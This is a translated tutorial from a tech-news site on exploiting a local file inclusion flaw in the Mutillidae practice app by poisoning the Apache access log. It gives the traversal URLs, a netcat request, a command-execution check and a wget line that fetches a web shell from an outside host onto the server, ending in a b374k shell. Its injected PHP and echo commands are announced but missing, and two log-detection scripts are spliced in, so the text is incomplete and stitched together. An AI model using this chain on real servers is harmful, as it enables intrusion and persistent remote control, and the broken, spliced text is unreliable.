
How to exploit LFI vulnerabilities through APACHE ACCESS LOG

2025-02-24 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01

This article explains how an Apache access log can be used to exploit an LFI vulnerability. The editor found it quite practical and is sharing it here for everyone to learn from.

Local file inclusion (LFI) vulnerabilities are often used by intruders to extract the contents of files on the server that hosts the site, such as passwd and hosts. But have you ever thought about taking it to another level? That is, obtaining a browser shell (c99, b374k, etc.) on the server through local file inclusion.

Setup

I'll use my local penetration test environment setup as an example. The web application I currently use is Mutillidae. In addition, we must configure Apache to allow directory traversal.

Options Indexes

Show time

First we look for LFI vulnerabilities. Clicking on a link, we see the following URL:

/index.php?page=

Let's try including a sensitive file path, /etc/passwd, and see what happens:

/index.php?page=/etc/passwd

The application actually read the contents of the file! This verifies that the app does have a local file inclusion vulnerability. Next, let's include the Apache access log and see if we can access its contents as well.

The location and file name of the access log vary from system to system; on my system it is /var/log/apache2/access.log. Modify the URL as follows:

/index.php?page=/var/log/apache2/access.log

That's great! The contents of the access log were also successfully loaded.

With the above initial validation, it is time to move on to our second phase.
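
The probe requests above leave a clear trace in the access log itself. As an added example (not code from the original article), this sketch parses Apache access log lines and flags requests whose page parameter carries a file path instead of a page name; the sample lines, the IP addresses and the home.php page name are constructed.

```python
import re
from urllib.parse import parse_qs

# Apache common/combined log format: host ident user [time] "request" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*?)" (?P<status>\d{3}) ')

# Shapes an include parameter should never have: absolute path, directory
# traversal, or a scheme-style wrapper prefix.
PATH_LIKE = re.compile(r'^/|\.\.[/\\]|^[a-z][a-z0-9.+-]*://', re.I)

def lfi_probes(lines, param="page"):
    """Return (ip, decoded value, status) for requests whose include
    parameter carries a file path instead of a page name."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("req").split(" ")
        if len(parts) < 2:
            continue
        query = parts[1].partition("?")[2]
        # parse_qs percent-decodes, so %2Fetc%2Fpasswd is caught as well
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if PATH_LIKE.search(value):
                hits.append((m.group("ip"), value, int(m.group("status"))))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from the article
SAMPLE = [
    '192.0.2.10 - - [17/Mar/2014:17:20:01 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Mar/2014:17:21:10 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 9340',
    '198.51.100.7 - - [17/Mar/2014:17:21:44 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fhosts HTTP/1.1" 200 7011',
    '198.51.100.7 - - [17/Mar/2014:17:22:30 +0000] "GET /index.php?page=%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 48211',
]

if __name__ == "__main__":
    for ip, value, status in lfi_probes(SAMPLE):
        print(f"{ip} requested include of {value!r} (HTTP {status})")
```

A hit that was answered with status 200 deserves the closest look, since the application did not reject the path.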

Apache Access Log Utilization

Before that, you need to know something about Apache logs.

The server access log records all requests processed by the server.

Reference source: httpd.apache.org/docs/1.3/logs.html#accesslog

This also means that any requests we send to the server will be saved there.

First we open a terminal and use netcat to send a GET request to the server. We don't use the browser to send this request because it URL-encodes the request, which would stop it from working properly. The code we inject is as follows:

About the passthru() function:

passthru - Executes external programs and displays raw output

Reference source: php.net/passthru

To send a request using netcat, we need to do the following in the terminal:

ncat 192.168.56.101 80

Then we type the following:

GET / HTTP/1.1
Host: 192.168.56.101
Connection: close

Note: Here you must change 192.168.56.101 to the IP address of your target. This is the IP address of my virtual machine.

It should end up looking like this:

$ ncat 192.168.56.101 80
GET / HTTP/1.1
Host: 192.168.56.101
Connection: close

HTTP/1.1 404 Not Found
Date: Mon, 17 Mar 2014 17:34:53 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/3.0.17 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

404 Not Found
Not Found
The requested URL /< was not found on this server.

Now let's verify that our injection works. Go back to the browser and add a new parameter to the URL:

cmd=

In our example, I will use the id command:

/index.php?page=/var/log/apache2/access.log&cmd=id

Now, let's look at the output we got. If you look closely, you will see something similar to the red box:

Our command was successfully executed on the server!

Now for the highlight: getting a browser shell onto the server. There are two ways to do this. The first is to use wget and the second is to inject an upload form. Let's start with the first one.

Use wget

Wget is a file download command. Although it is not always effective, it is the easiest method, so it is the first one to try. Change the cmd parameter as follows:

&cmd=wget http://somedomain.com/shellfile.php

This will download shellfile.php to the server and save it in the current working directory (if readable). If you want to save it somewhere else, you can refer to the wget manual. This way, you can save yourself the intermediate step of uploading the form.

Upload form

If wget doesn't work, we can use the upload form method. We will execute echo on the server, which will write our arbitrary content to a file. Change the cmd parameter as follows:

This creates a file on the server with the upload form. Then we open the upload page in our browser and upload our browser shell.

As shown below, we successfully uploaded the b374k shell.

Process review

1. Verify the LFI vulnerability by obtaining passwd, hosts and other files;

2. Access the Apache log via the LFI vulnerability;

3. Send malicious requests using netcat or similar tools;

4. Verify code execution by testing simple commands such as id, whoami, etc.;

5. Add the browser shell to the server using wget or by writing the upload form to the server;

6. Access the browser shell to verify success.

While this is not an ultra-high risk vulnerability in itself, it could pose a significant security threat if properly exploited.
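
Steps 2 to 4 of the review can be recognised in the same log. This added example (not from the original article) flags lines where a raw PHP open tag was written into the log and requests that include a log file through page, marking those that come after the log was poisoned; the sample lines are constructed and the tag body is a placeholder.

```python
import re
from urllib.parse import unquote

# Apache common/combined log format: host ident user [time] "request" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*?)" (?P<status>\d{3}) ')
# A raw PHP open tag has no business anywhere in an access log line
PHP_TAG = re.compile(r'<\?(php|=|\s)', re.I)
# Include parameter pointing at a log file (checked after percent-decoding)
LOG_INCLUDE = re.compile(r'[?&]page=[^&\s]*(/var/log/|access[._]log)', re.I)

def triage(lines):
    """Return (line number, client ip, finding) for each line that matches
    a stage of the log-poisoning chain."""
    findings = []
    poisoned_at = None  # first line number at which code entered the log
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        req = unquote(m.group("req"))
        if PHP_TAG.search(line):
            poisoned_at = poisoned_at or n
            findings.append((n, m.group("ip"), "php-tag-in-log"))
        elif LOG_INCLUDE.search(req):
            # Once the log is poisoned, every include of it runs the code
            stage = "log-included-after-poisoning" if poisoned_at else "log-included"
            findings.append((n, m.group("ip"), stage))
    return findings

# Constructed sample lines; PLACEHOLDER stands in for any injected code
SAMPLE = [
    '192.0.2.10 - - [17/Mar/2014:17:30:01 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Mar/2014:17:33:40 +0000] "GET /index.php?page=/var/log/apache2/access.log HTTP/1.1" 200 48211',
    '198.51.100.7 - - [17/Mar/2014:17:34:53 +0000] "GET /<?php PLACEHOLDER ?> HTTP/1.1" 404 202',
    '198.51.100.7 - - [17/Mar/2014:17:36:12 +0000] "GET /index.php?page=%2Fvar%2Flog%2Fapache2%2Faccess.log&cmd=id HTTP/1.1" 200 48950',
]

if __name__ == "__main__":
    for n, ip, finding in triage(SAMPLE):
        print(f"line {n}: {ip} {finding}")
```

A php-tag-in-log hit means the log file itself now carries code, so preserve a copy for the investigation and rotate it. The durable fix is for the application to resolve page against a fixed list of page names.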

That is how an LFI vulnerability can be exploited through the Apache access log. Some of these points may come up in day-to-day work, and I hope you have learned something from this article.
